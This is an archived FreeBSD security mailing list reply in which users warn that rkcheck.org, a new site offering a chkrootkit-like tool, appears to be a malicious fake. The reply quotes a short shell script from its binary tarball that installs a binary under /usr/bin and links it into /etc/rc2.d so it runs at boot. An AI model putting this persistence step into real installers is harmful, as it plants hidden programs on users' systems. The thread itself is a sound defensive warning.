From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:11:40 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 8EC48F9B for ; Wed, 25 Feb 2015 21:11:40 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 4581DA43 for ; Wed, 25 Feb 2015 21:11:40 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id DF73C2D64136; Wed, 25 Feb 2015 22:11:38 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id a_h3Wf12V0fH; Wed, 25 Feb 2015 22:11:36 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id 73C862D631A7; Wed, 25 Feb 2015 22:11:36 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <864mq9ya2u.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 22:11:37 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> <864mq9ya2u.fsf@gly.ftfl.ca> To: Joseph Mingrone X-Mailer: Apple Mail (2.1993) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:11:40 -0000 > Am 25.02.2015 um 22:07 schrieb Joseph Mingrone : >=20 > Christopher Schulte writes: >=20 >>> On Feb 25, 2015, at 2:34 PM, Philip Jocks = wrote: >>>=20 >>> it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org >>> which was registered a few days ago and looks like a tampered = version of >>> chkrootkit. I hope, nobody installed it anywhere, it seems to = execute >>> rkcheck/tests/.unit/test.sh which contains >>>=20 >>> #!/bin/bash >>>=20 >>> cp tests/.unit/test /usr/bin/rrsyncn >>> chmod +x /usr/bin/rrsyncn >>> rm -fr /etc/rc2.d/S98rsyncn >>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >>> /usr/bin/rrsyncn >>> exit >=20 > Are you looking at the tarball from the "source code" link, > http://rkcheck.org/download.php?file=3Drkcheck-1.4.3-src.tar.gz? >=20 > % tar -xvf rkcheck-1.4.3-src.tar.gz=20 > x rkcheck/ > x rkcheck/chkdirs.c > x rkcheck/README.chklastlog > x rkcheck/README.chkwtmp > x rkcheck/chkutmp.c > x rkcheck/chkrootkit > x rkcheck/chkrootkit.lsm > x rkcheck/check_wtmpx.c > x rkcheck/COPYRIGHT > x rkcheck/strings.c > x rkcheck/ifpromisc.c > x rkcheck/ACKNOWLEDGMENTS > x rkcheck/chklastlog.c: truncated gzip input > tar: Error exit delayed from previous errors. >=20 > I don't see a /tests/ directory or any directory under rkcheck. the "source code" tar is broken intentionally, I guess, so that people = install the binaries. The stuff I posted was from the binary tar files = which contain shell scripts etc. Philip